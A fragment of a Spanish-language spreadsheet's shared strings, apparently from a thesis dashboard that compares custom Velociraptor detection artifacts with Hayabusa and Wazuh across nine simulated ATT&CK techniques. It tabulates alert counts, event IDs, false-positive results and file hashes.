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&lt;RAÍZ_TFM&gt;\08_MEMORIA\ENTREGA\_FINAL_ITERATION_20260804\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{2FA3EB70-0252-4E8B-B6FA-4B2120F3E0C2}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="6795" yWindow="2970" windowWidth="21600" windowHeight="11295" firstSheet="18" activeTab="19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Resultados_Custom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VISIBILIDAD_SISTEMA!$A$3:$N$11</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="26" hidden="1">WAZUH_DETALLE!$A$4:$G$11</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="0">'00_Guia'!$A$1:$C$14</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="1">'01_Dashboard'!$A$1:$N$66</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="3">'03_Evaluacion_VR'!$A$1:$O$12</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="5">'05_Matriz_Resultados'!$A$1:$Z$13</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="6">'06_Resumen'!$A$1:$C$17</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="7">'07_Catalogo_Artifacts'!$A$1:$U$21</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="9">'09_Resultados_Custom'!$A$1:$L$64</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="14">'14_Arquitectura_Custom'!$A$1:$I$15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8">FUENTES!$A$1:$J$241</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="29">GRAFICAS!$A$1:$U$76</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="21">VISIBILIDAD_SISTEMA!$A$1:$N$13</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="26">WAZUH_DETALLE!$A$1:$H$19</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="0">'00_Guia'!$3:$3</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="3">'03_Evaluacion_VR'!$3:$3</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="5">'05_Matriz_Resultados'!$4:$4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="6">'06_Resumen'!$3:$3</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="7">'07_Catalogo_Artifacts'!$4:$4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="9">'09_Resultados_Custom'!$4:$4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="14">'14_Arquitectura_Custom'!$3:$3</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="15">'15_Publicos_Definitivo'!$4:$4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="28">FUENTES!$3:$3</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="21">VISIBILIDAD_SISTEMA!$3:$3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1" l="1"/>
  <c r="B34" i="21"/>
  <c r="C14" i="27"/>
  <c r="C13" i="27"/>
  <c r="C12" i="27"/>
  <c r="C11" i="27"/>
  <c r="K13" i="23"/>
  <c r="K12" i="23"/>
  <c r="J13" i="23"/>
  <c r="J12" i="23"/>
  <c r="I13" i="23"/>
  <c r="I12" i="23"/>
  <c r="H13" i="23"/>
  <c r="H12" i="23"/>
  <c r="G13" i="23"/>
  <c r="G12" i="23"/>
  <c r="F13" i="23"/>
  <c r="F12" i="23"/>
  <c r="E13" i="23"/>
  <c r="E12" i="23"/>
  <c r="D13" i="23"/>
  <c r="D12" i="23"/>
  <c r="C13" i="23"/>
  <c r="C12" i="23"/>
  <c r="B13" i="23"/>
  <c r="B12" i="23"/>
  <c r="S11" i="17"/>
  <c r="Q11" i="17"/>
  <c r="P11" i="17"/>
  <c r="O11" i="17"/>
  <c r="N11" i="17"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="12679" uniqueCount="3451">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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08_Benignas_FP</t>
  </si>
  <si>
    <t>10_Gaps_Custom_P1P4</t>
  </si>
  <si>
    <t>Gaps y diseño custom P4-P1</t>
  </si>
  <si>
    <t>Justificar artifacts propios</t>
  </si>
  <si>
    <t>KPI</t>
  </si>
  <si>
    <t>Valor</t>
  </si>
  <si>
    <t>Acción</t>
  </si>
  <si>
    <t>Principal</t>
  </si>
  <si>
    <t>Ampliada</t>
  </si>
  <si>
    <t>3</t>
  </si>
  <si>
    <t>Custom necesario</t>
  </si>
  <si>
    <t>Sí</t>
  </si>
  <si>
    <t>TEC-009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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Positivo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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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VR-006</t>
  </si>
  <si>
    <t>Evaluación Security Software Discovery</t>
  </si>
  <si>
    <t>VR-007</t>
  </si>
  <si>
    <t>Evaluación Data Encrypted for Impact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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Indicador</t>
  </si>
  <si>
    <t>ETW.Monitoring</t>
  </si>
  <si>
    <t>TEC-001 a TEC-009</t>
  </si>
  <si>
    <t>Artifact</t>
  </si>
  <si>
    <t>Tipo</t>
  </si>
  <si>
    <t>Built-in</t>
  </si>
  <si>
    <t>Client Monitoring</t>
  </si>
  <si>
    <t>Mantener</t>
  </si>
  <si>
    <t>TEC-004/007/008/009</t>
  </si>
  <si>
    <t>Medio</t>
  </si>
  <si>
    <t>Windows.ETW.Monitoring</t>
  </si>
  <si>
    <t>Medio/alto</t>
  </si>
  <si>
    <t>Documentar</t>
  </si>
  <si>
    <t>Generic.Events.TrackNetworkConnections</t>
  </si>
  <si>
    <t>TEC-009 contextual</t>
  </si>
  <si>
    <t>Mantener con filtro</t>
  </si>
  <si>
    <t>Server.Alerts.TrackNetworkConnections</t>
  </si>
  <si>
    <t>Server Monitoring</t>
  </si>
  <si>
    <t>Transporte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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Objetivo</t>
  </si>
  <si>
    <t>No</t>
  </si>
  <si>
    <t>Evidencia forense</t>
  </si>
  <si>
    <t>Gaps públicos y diseño custom P4-P1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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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P3</t>
  </si>
  <si>
    <t>4104 + CommandLine</t>
  </si>
  <si>
    <t>Media</t>
  </si>
  <si>
    <t>GAP-005</t>
  </si>
  <si>
    <t>Arquitectura operativa</t>
  </si>
  <si>
    <t>P4-P1</t>
  </si>
  <si>
    <t>4 profiles con sources por técnica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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Source interna</t>
  </si>
  <si>
    <t>Señal principal</t>
  </si>
  <si>
    <t>P4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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Hits FP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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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&lt;RAÍZ_TFM&gt;\03_RUNNERS\TFM_Run_All_TEC_Tests_v6_PATCHED_4104.ps1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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Zip=&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\TEC-009_Exfiltracion\staging_controlled\tec009_controlled_archive.zip; ZipCopy=&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\TEC-009_Exfiltracion\staging_controlled\tec009_controlled_archive_copy.zip; SHA256=31e202c49811f354b51162baecb4ed174e4b0f0805c50c9f91c9f7ec5f642a59; Summary=&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\TEC-009_Exfiltracion\staging_controlled\tec009_transfer_summary.json;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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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"&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\TEC-007_Ransomware\crear_directorio_dummy.ps1"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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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"&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\TEC-008_Sabotaje\crear_directorio_dummy.ps1"</t>
  </si>
  <si>
    <t>2026-06-24T12:50:39.376Z</t>
  </si>
  <si>
    <t>powershell.exe -NoProfile -ExecutionPolicy Bypass -File "&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\TEC-009_Exfiltracion\crear_directorio_dummy.ps1"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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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"&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\TEC-007_Ransomware\enumeracion.ps1"</t>
  </si>
  <si>
    <t>2026-06-24T12:52:54.916Z</t>
  </si>
  <si>
    <t>powershell.exe -NoProfile -ExecutionPolicy Bypass -File "&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\TEC-007_Ransomware\Scriptransom.ps1"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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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'&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\DUMB_LAB';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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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"&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\TEC-009_Exfiltracion\exfiltracion_v3.ps1" -ReceiverUrl "http://&lt;HOST_LAB&gt;:8088/upload"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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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"&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\TEC-007_Ransomware\crear_directorio_dummy.ps1"</t>
  </si>
  <si>
    <t>2026-06-24T12:50:31.999Z</t>
  </si>
  <si>
    <t>"cmd.exe" /d /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File "&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\TEC-008_Sabotaje\crear_directorio_dummy.ps1"</t>
  </si>
  <si>
    <t>2026-06-24T12:50:39.261Z</t>
  </si>
  <si>
    <t>"cmd.exe" /d /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File "&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\TEC-009_Exfiltracion\crear_directorio_dummy.ps1"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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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"&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\TEC-007_Ransomware\enumeracion.ps1"</t>
  </si>
  <si>
    <t>2026-06-24T12:52:54.853Z</t>
  </si>
  <si>
    <t>"cmd.exe" /d /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File "&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\TEC-007_Ransomware\Scriptransom.ps1"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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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'&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\DUMB_LAB';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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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"&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\TEC-009_Exfiltracion\exfiltracion_v3.ps1" -ReceiverUrl "http://&lt;HOST_LAB&gt;:8088/upload"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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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"&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas"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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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'&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\DUMB_LAB';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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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"&lt;HOST_LAB&gt;", "SourceHostname": "LT29.ait.us.es", "SourcePort": 64583, "SourcePortName": "-", "DestinationIsIpv6": false, "DestinationIp": "&lt;HOST_LAB&gt;",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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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"&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas"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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\FP_WORKSPACE\TFM_FP_20260626_101948\FP-001_benign.txt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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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"&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\FP_WORKSPACE\TFM_FP_20260626_101948"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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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&lt;RAÍZ_TFM&gt;\01_ACTIVE_TESTS\Pruebas\FP_WORKSPACE\TFM_FP_20260626_101948\FP-003_scheduled_task_ok.txt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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
